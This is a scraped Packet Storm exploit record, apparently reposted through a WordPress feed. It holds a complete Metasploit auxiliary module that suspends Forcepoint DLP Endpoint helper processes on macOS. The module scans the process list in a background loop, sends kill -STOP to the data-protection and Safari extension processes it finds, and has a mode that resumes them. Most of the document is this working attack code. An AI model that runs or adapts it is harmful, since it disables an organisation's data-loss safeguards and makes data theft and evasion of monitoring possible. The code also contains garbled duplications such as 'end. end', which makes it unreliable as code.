{“lastseen”:”2026-04-23T16:47:48″,”description”:”This Metasploit auxiliary module targets Forcepoint Data Loss Prevention DLP Endpoint on macOS and attempts to manipulate or suspend related security processes…”,”published”:”2026-04-23T00:00:00″,”modified”:”2026-04-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Forcepoint One Endpoint macOS 25.08.5008 Forcepoint DLP Endpoint Process Suspension Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:219672″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : Forcepoint One Endpoint macOS 25.08.5008 Forcepoint DLP Endpoint Process Suspension Bypass |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.forcepoint.com\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit auxiliary module targets Forcepoint Data Loss Prevention (DLP) Endpoint on macOS and attempts to manipulate or suspend related security processes.\\n \\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary \\n include Msf::Post::File \\n include Msf::Post::Common \\n include Msf::Auxiliary::Report \\n \\n def initialize(info = {}) \\n super( \\n update_info( \\n info, \\n ‘Name’ =\\u003e ‘Forcepoint DLP Endpoint for macOS Process Suspension Bypass’, \\n ‘Description’ =\\u003e %q{…}, \\n ‘Author’ =\\u003e [‘indoushka’], \\n ‘License’ =\\u003e MSF_LICENSE, \\n ‘Platform’ =\\u003e [‘osx’], \\n ‘Arch’ =\\u003e [ARCH_X64, ARCH_ARM64], \\n ‘SessionTypes’ =\\u003e [‘shell’, ‘meterpreter’], \\n ‘Targets’ =\\u003e [[‘macOS (Safari + Forcepoint DLP)’, {}]], \\n ‘DefaultTarget’ =\\u003e 0, \\n ‘Actions’ =\\u003e [ \\n [‘START’, { ‘Description’ =\\u003e ‘Start bypass’ }], \\n [‘STOP’, { ‘Description’ =\\u003e ‘Stop bypass’ }], \\n [‘CHECK’, { ‘Description’ =\\u003e ‘Check target’ }] \\n ], \\n ‘DefaultAction’ =\\u003e ‘START’ \\n ) \\n ) \\n \\n register_options([ \\n OptInt.new(‘SCAN_INTERVAL’, [true, ‘Interval in seconds between scans’, 1]), \\n OptBool.new(‘BACKGROUND’, [true, ‘Run in background’, true]), \\n OptString.new(‘TARGET_PROCESSES’, [true, ‘Processes’, \\n ‘Websense Endpoint Helper,SafariExtension,ForcepointExtensions,com.forcepoint.dlp.safari,SafariContentBlocker’]) \\n ]) \\n end. end \\n \\n def run \\n case action.name \\n when ‘CHECK’ \\n check_vulnerability \\n when ‘START’ \\n start_bypass \\n when ‘STOP’ \\n stop_bypass \\n else \\n print_error(\\”Invalid action: #{action.name}\\”) \\n end. end \\n end. end \\n \\n def check_vulnerability \\n print_status(\\”Checking for Forcepoint DLP…\\”) \\n \\n wsdlpd = cmd_exec(\\”pgrep -x wsdlpd\\”).to_s.strip \\n if wsdlpd. empty? \\n print_error(\\”wsdlpd not found\\”) \\n return Exploit::CheckCode::Safe \\n end. end \\n \\n print_good(\\”wsdlpd found (PID: #{wsdlpd})\\”) \\n \\n uid = cmd_exec(\\”id -u\\”).to_s.strip.to_i \\n \\n unless uid == 0 \\n test_pid = wsdlpd.split.first \\n result = cmd_exec(\\”kill -STOP #{test_pid} 2\\u003e\\u00261\\”).to_s \\n \\n if result.include?(\\”Operation not permitted\\”) \\n print_good(\\”wsdlpd protected (EPERM)\\”) \\n end. end \\n \\n cmd_exec(\\”kill -CONT #{test_pid} 2\\u003e\\u00261\\”) \\n end. end \\n \\n targets = datastore[‘TARGET_PROCESSES’].to_s.split(‘,’) \\n found_helpers = [] \\n \\n targets. each do |proc| \\n result = cmd_exec(\\”pgrep -f ‘#{proc.strip}’\\”).to_s.strip \\n unless result. empty? \\n found_helpers \\u003c\\u003c proc. strip \\n print_good(\\”Found: #{proc.strip} (PID: #{result})\\”) \\n end. end \\n end. end \\n \\n if found_helpers. empty? \\n print_warning(\\”No helper processes found\\”) \\n return Exploit::CheckCode::Detected \\n end. end \\n \\n print_good(\\”Target appears vulnerable\\”) \\n Exploit::CheckCode::Appears \\n end. end \\n \\n def start_bypass \\n print_status(\\”Starting bypass…\\”) \\n \\n return unless check_vulnerability == Exploit::CheckCode::Appears \\n \\n if datastore[‘BACKGROUND’] \\n @bypass_thread = framework.threads.spawn(\\”ForcepointBypass\\”, false) do \\n bypass_loop \\n end. end \\n print_good(\\”Running in background\\”) \\n else \\n bypass_loop \\n end. end \\n end. end \\n \\n def bypass_loop \\n targets = datastore[‘TARGET_PROCESSES’].to_s.split(‘,’) \\n my_uid = cmd_exec(\\”id -u\\”).to_s.strip.to_i \\n my_pid = Process.pid # FIX: Replace echo $$ \\n \\n loop do \\n begin \\n ps_output = cmd_exec(\\”ps -ax -o pid=,uid=,comm=\\”).to_s \\n \\n ps_output.each_line do |line| \\n parts = line.strip.split(\/\\\\s+\/, 3) \\n next if parts.length \\u003c 3 \\n \\n pid = parts[0]. to_i \\n uid = parts[1]. to_i \\n comm = parts[2].to_s \\n \\n next if pid == my_pid \\n \\n targets.each do |target| \\n next unless comm.downcase.include?(target.strip.downcase) \\n \\n if uid == my_uid \\n result = cmd_exec(\\”kill -STOP #{pid} 2\\u003e\\u00261\\”).to_s \\n print_good(\\”Suspended #{pid} (#{comm})\\”) if result. empty? \\n end. end \\n end. end \\n end. end \\n \\n sleep(datastore[‘SCAN_INTERVAL’].to_i) \\n rescue =\\u003e e \\n print_error(\\”Loop error: #{e}\\”) \\n break. break \\n end. end \\n end. end \\n end. end \\n \\n def stop_bypass \\n print_status(\\”Stopping bypass…\\”) \\n \\n if @bypass_thread \\u0026\\u0026 @bypass_thread.alive? \\n @bypass_thread.kill \\n end. end \\n \\n targets = datastore[‘TARGET_PROCESSES’].to_s.split(‘,’) \\n resumed = 0 \\n \\n targets.each do |target| \\n pids = cmd_exec(\\”pgrep -f ‘#{target.strip}’\\”).to_s.strip \\n next if pids. empty? \\n \\n pids.split.each do |pid| \\n result = cmd_exec(\\”kill -CONT #{pid} 2\\u003e\\u00261\\”).to_s \\n if result. empty? \\n resumed += 1 \\n print_good(\\”Resumed #{pid}\\”) \\n end. end \\n end. end \\n end. end \\n \\n print_good(\\”Resumed #{resumed} processes\\”) \\n end. end\\n end. end\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219672″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219672\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-23T16:47:48″,”description”:”This Metasploit auxiliary module targets Forcepoint Data Loss Prevention DLP Endpoint on macOS and attempts to manipulate or suspend related security processes…”,”published”:”2026-04-23T00:00:00″,”modified”:”2026-04-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Forcepoint One Endpoint…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-48967","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n